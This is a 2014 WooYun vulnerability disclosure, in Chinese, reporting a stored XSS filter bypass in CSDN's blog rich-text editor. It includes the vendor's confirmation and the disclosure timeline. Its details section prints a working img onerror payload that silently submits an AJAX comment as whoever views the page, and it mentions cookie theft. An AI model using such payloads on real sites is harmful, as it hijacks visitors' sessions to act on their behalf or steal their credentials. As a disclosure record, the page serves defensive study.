当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061990

漏洞标题:CSDN博客的富文本输入XSS过滤不严(自动XX)

相关厂商:CSDN开发者社区

漏洞作者: 路人甲

提交时间:2014-05-23 15:19

修复时间:2014-07-07 15:19

公开时间:2014-07-07 15:19

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-23: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-06-03: 细节向核心白帽子及相关领域专家公开
2014-06-13: 细节向普通白帽子公开
2014-06-23: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

CSDN博客的富文本输入XSS过滤不严(自动XX)

详细说明:

CSDN写博客->富文本输入->XSS过滤了<script> onmouseover这些,但是
<img src=# onerror="alert(1)">没有过滤掉。可以用来拿cookie, 自动发帖,自动回复,等等

<img style="display:none" src="#" onerror="var url ='http://blog.csdn.net/nanjingjiangbiao/comment/submit?id=26670315';var poststr = 'content=autoreplaybytonyxss&amp;commentid=&amp;replyId=';var ajax =null;if(window.ActiveXObject) {ajax = new ActiveXObject('Microsoft.XMLHTTP');}else if (window.XMLHttpRequest){ajax = new XMLHttpRequest();}ajax.open('POST', url, true);ajax.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');ajax.send(poststr);ajax.onreadystatechange = function(){if(ajax.readyState ==4 &amp;&amp; ajax.status == 200){}}" alt="" />


上面这段代码就能嵌入富文本编辑器,然后用Ajax自动回复博客

漏洞证明:

访问下面这个博客
http://blog.csdn.net/thestoryoftony/article/details/26670315
你就能看到自己的自动回复。

csdn.png

修复方案:

加强XSS过滤哦,亲

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-05-24 00:12

厂商回复:

收到,尽快修复,多谢。

最新状态:

暂无